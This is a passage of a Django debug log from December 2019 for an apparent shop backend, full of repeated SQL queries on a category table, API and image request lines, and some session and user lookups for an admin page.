12:37:00,898 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:37:00,902 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:37:00,907 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:37:00,910 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:37:00] "GET /api/v1/categories/ HTTP/1.0" 200 2595 [13/Dec/2019 12:37:01] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 304 0 [13/Dec/2019 12:37:01] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 304 0 [13/Dec/2019 12:37:01] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 304 0 [13/Dec/2019 12:37:01] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 304 0 [13/Dec/2019 12:40:46] "GET / HTTP/1.0" 302 0 [13/Dec/2019 12:45:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 12:48:39,662 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:48:39,671 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:48:39,674 utils 11259 139831317362432 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:48:39,680 utils 11259 139831538779904 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:48:39,684 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:48:39,687 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 12:48:39,692 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) [13/Dec/2019 12:48:39] "GET /api/v1/categories/6 HTTP/1.0" 200 192 DEBUG 2019-12-13 12:48:39,696 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 12:48:39,701 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 12:48:39,705 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:48:39,709 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:48:39,713 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:48:39,717 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:48:39,721 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:48:39,725 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:48:39,729 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:48:39,733 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:48:39] "GET /api/v1/categories/ HTTP/1.0" 200 2595 [13/Dec/2019 12:48:40] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 304 0 [13/Dec/2019 12:48:40] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 304 0 [13/Dec/2019 12:48:40] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 304 0 [13/Dec/2019 12:48:40] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 304 0 DEBUG 2019-12-13 12:49:24,880 utils 11259 139831552767744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:49:24,889 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:49:24,893 utils 11259 139831317362432 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 14; args=(14,) DEBUG 2019-12-13 12:49:24,897 utils 11259 139831552767744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:49:24,900 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 12:49:24,901 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 12:49:24,904 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 12:49:24,907 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) [13/Dec/2019 12:49:24] "GET /api/v1/categories/14 HTTP/1.0" 200 212 DEBUG 2019-12-13 12:49:24,911 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 12:49:24,915 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:49:24,917 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:49:24,920 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:49:24,924 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:49:24,928 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:49:24,932 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:49:24,936 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:49:24,940 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:49:24] "GET /api/v1/categories/ HTTP/1.0" 200 2595 DEBUG 2019-12-13 12:50:03,295 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:50:03,300 utils 11259 139831552767744 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:50:03,305 utils 11259 139831317362432 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:50:03,307 utils 11259 139831552767744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:50:03,309 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:50:03,313 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [13/Dec/2019 12:50:03] "GET /api/v1/categories/6 HTTP/1.0" 200 192 DEBUG 2019-12-13 12:50:03,316 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 12:50:03,318 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 12:50:03,320 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 12:50:03,323 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:50:03,325 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:50:03,327 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:50:03,330 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:50:03,332 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:50:03,334 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:50:03,336 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:50:03,339 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:50:03] "GET /api/v1/categories/ HTTP/1.0" 200 2595 [13/Dec/2019 12:51:12] "GET / HTTP/1.0" 302 0 [13/Dec/2019 12:56:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 12:59:44,528 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:59:44.515409+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 59, 44, 515409, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:59:44,531 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:59:44,534 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 11; args=(11,) DEBUG 2019-12-13 12:59:44,587 utils 11259 139831317362432 (0.001) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:59:44,663 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:59:44.660311+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 59, 44, 660311, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:59:44] "GET /shop/category/11/change/ HTTP/1.0" 200 8204 DEBUG 2019-12-13 12:59:44,975 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:59:44.966671+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 59, 44, 966671, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:59:44,978 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 12:59:44] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 